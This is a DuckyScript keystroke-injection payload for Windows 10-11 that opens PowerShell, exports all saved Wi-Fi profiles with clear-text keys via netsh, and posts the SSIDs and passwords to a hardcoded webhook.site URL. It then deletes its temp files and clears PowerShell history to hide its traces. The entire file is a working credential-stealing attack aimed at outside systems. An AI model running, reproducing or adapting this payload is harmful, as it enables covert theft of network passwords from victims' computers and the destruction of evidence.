REM ###################################################################
REM #                                                                 |
REM # Title        : WLAN-Windows-Passwords-to-WebHook                |
REM # Author       : Lin                                              |
REM # Description: Send wifi PWD to https://webhook.site/#!/edit/0dbf813f-1030-4da2-9b7a-86226546ff60            |
REM # Category     : Credentials                                      |
REM # Target       : Windows 10-11                                    |
REM # Version      : 1.0                                              |
REM #                                                                 |
REM ###################################################################

REM *************** ABRE POWER SHELL  *****************
DELAY 250
GUI r
DELAY 250
STRING powershell
ENTER
DELAY 2050
REM *************** ABRE POWER SHELL *****************
REM ***************** EXECUTA O ENVIO DAS SENHAS *********************
STRING $p="$env:TEMP\p";md $p >$null;cd $p;netsh wlan export profile key=clear >$null;$r=ls|%{[xml]$x=Get-Content $_.FullName;[PSCustomObject]@{SSID=$x.WLANProfile.Name;Password=$x.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};$f=($r|ForEach-Object {"$($_.SSID) >> $($_.Password)"} | Out-String).Trim();$content="r`n$f`r`n`````";$bytes=[System.Text.Encoding]::UTF8.GetBytes($content);Invoke-RestMethod -Uri 'https://webhook.site/0dbf813f-1030-4da2-9b7a-86226546ff60' -Method Post -Body $bytes -ContentType 'text/plain; charset=utf-8';cd ..;Remove-Item $p -Recurse -Force
ENTER
DELAY 250
REM ***************** EXECUTA O ENVIO DAS SENHAS *********************
REM ***************** LIMPAR RASTROS E SAIR *********************
STRING [Microsoft.PowerShell.PSConsoleReadLine]::ClearHistory()
ENTER
DELAY 250
STRING exit
ENTER
DELAY 250
REM ***************** LIMPAR RASTROS E SAIR *********************